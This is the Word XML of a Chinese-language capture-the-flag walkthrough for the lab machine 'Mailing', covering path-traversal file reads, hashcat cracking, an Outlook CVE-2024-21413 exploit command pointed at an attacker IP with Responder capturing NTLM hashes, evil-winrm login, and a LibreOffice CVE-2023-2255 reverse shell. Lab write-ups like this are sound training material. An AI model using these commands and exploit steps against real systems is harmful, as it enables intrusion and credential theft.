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2933700" cy="2845435"/>
            <wp:effectExtent l="0" t="0" r="7620" b="4445"/>
            <wp:docPr id="3" name="圖片 3" descr="mail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mailing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TW"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4629150" cy="3120390"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="2" name="圖片 2" descr="mail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mailin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42560" cy="2450465"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1" name="圖片 1" descr="mail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mailing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新增</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>/etc/hosts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9230" cy="2525395"/>
            <wp:effectExtent l="0" t="0" r="3810" b="4445"/>
            <wp:docPr id="6" name="圖片 6" descr="maili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mailing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在mailing.htb發現download button，用burp suite查看發現會導向download.php並附加file參數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6690" cy="2146935"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1905"/>
            <wp:docPr id="5" name="圖片 5" descr="maili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mailing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將參數內容改為../../../../../../../../../Windows/system.ini會顯示組態內容，具有LFI漏洞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1770" cy="2151380"/>
            <wp:effectExtent l="0" t="0" r="1270" b="12700"/>
            <wp:docPr id="4" name="圖片 4" descr="maili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mailing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已知對方用hMailServer，嘗試找hMailServer.ini路徑，可親自載hMailServer能較清楚知道路徑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color w:val="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>https://ithelp.ithome.com.tw/articles/10274422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下載設置教學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../../../../../../../../../Program+Files+(x86)/hMailServer/Bin/hMailServer.ini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參數設置如上，取得administrator password hash {841bb5acfa6779ae432fd7a4e6600ba7}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4664075" cy="281940"/>
            <wp:effectExtent l="0" t="0" r="14605" b="7620"/>
            <wp:docPr id="7" name="圖片 7" descr="maili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mailing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hashcat -m 0 -a 0 hash /usr/share/wordlists/rockyou.txt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破解明碼為homenetworkingadministrator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7325" cy="2707005"/>
            <wp:effectExtent l="0" t="0" r="5715" b="5715"/>
            <wp:docPr id="9" name="圖片 9" descr="maili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mailing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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5262245" cy="629920"/>
            <wp:effectExtent l="0" t="0" r="10795" b="10160"/>
            <wp:docPr id="8" name="圖片 8" descr="maili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mailing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Google發現有microsoft outlook cve</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability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可以搭配responder取得目標用戶NTLM hash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左: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python CVE-2024-21413.py --server "mailing.htb" --port 25 --username "administrator@mailing.htb" --password "homenetworkingadministrator" --sender "administrator@mailing.htb" --recipient "maya@mailing.htb" --url "10.10.14.21/instructions.pdf" --subject "Hi"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右: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sudo responder -I tun0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這邊可從下載的instructions.pdf得知寄送用戶可設為maya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取得hash為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maya::MAILING:801af35803aa54be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1610" cy="268605"/>
            <wp:effectExtent l="0" t="0" r="11430" b="5715"/>
            <wp:docPr id="10" name="圖片 10" descr="mailin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mailing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hashcat -m 5600 -a 0 hash /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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破解hash明碼為m4y4ngs4ri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4054475" cy="396240"/>
            <wp:effectExtent l="0" t="0" r="14605" b="0"/>
            <wp:docPr id="11" name="圖片 11" descr="maili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mailing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evil-winrm -i 10.10.11.14 -u maya -p m4y4ngs4ri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連線server，在desktop取得user.txt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1135" cy="1092200"/>
            <wp:effectExtent l="0" t="0" r="1905" b="5080"/>
            <wp:docPr id="15" name="圖片 15" descr="mailing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mailing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因為box拒絕執行exe/bat file，無法用winpeas直接掃弱點，慢慢搜尋發現Important Document dir，有admin權限，先記錄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4310" cy="1299845"/>
            <wp:effectExtent l="0" t="0" r="13970" b="10795"/>
            <wp:docPr id="14" name="圖片 14" descr="mailing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mailing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在program file下發現libreoffice version 7.4，有cve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https://github.com/elweth-sec/CVE-2023-2255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3040" cy="1695450"/>
            <wp:effectExtent l="0" t="0" r="0" b="11430"/>
            <wp:docPr id="17" name="圖片 17" descr="mailing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mailing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用reverse shell generator製作windows python shell (shell.py)上傳至maya/Desktop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4310" cy="1070610"/>
            <wp:effectExtent l="0" t="0" r="13970" b="11430"/>
            <wp:docPr id="16" name="圖片 16" descr="mailin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mailing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將POC結果生成的exploit.odt傳至Important Document，在exploit.odt被執行後過一陣子會反彈shell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3253740" cy="541020"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="18" name="圖片 18" descr="mailing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mailing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取得root.txt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E3B71"/>
    <w:rsid w:val="0E837A6F"/>
    <w:rsid w:val="0E91579B"/>
    <w:rsid w:val="14910A53"/>
    <w:rsid w:val="18FE41D3"/>
    <w:rsid w:val="19247DE8"/>
    <w:rsid w:val="19FD218B"/>
    <w:rsid w:val="1A365BF2"/>
    <w:rsid w:val="1DB36801"/>
    <w:rsid w:val="1DE649D9"/>
    <w:rsid w:val="1E0E7670"/>
    <w:rsid w:val="1F74771E"/>
    <w:rsid w:val="22FD0E1C"/>
    <w:rsid w:val="24CD7642"/>
    <w:rsid w:val="28C24362"/>
    <w:rsid w:val="28D00B6A"/>
    <w:rsid w:val="33D67EDC"/>
    <w:rsid w:val="3442290B"/>
    <w:rsid w:val="34441FE1"/>
    <w:rsid w:val="34586075"/>
    <w:rsid w:val="38B17F42"/>
    <w:rsid w:val="42374457"/>
    <w:rsid w:val="48025036"/>
    <w:rsid w:val="485C1EF1"/>
    <w:rsid w:val="4E0865C7"/>
    <w:rsid w:val="50E412D3"/>
    <w:rsid w:val="53284EA3"/>
    <w:rsid w:val="53E229C5"/>
    <w:rsid w:val="5B6D45E2"/>
    <w:rsid w:val="6393045B"/>
    <w:rsid w:val="63C3649E"/>
    <w:rsid w:val="6CC17EB2"/>
    <w:rsid w:val="6CD2266B"/>
    <w:rsid w:val="6F2F4B47"/>
    <w:rsid w:val="729230BB"/>
    <w:rsid w:val="783D01FF"/>
    <w:rsid w:val="7B6722D3"/>
    <w:rsid w:val="7E603F19"/>
    <w:rsid w:val="7FD55588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ACER</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-04T04:02:48Z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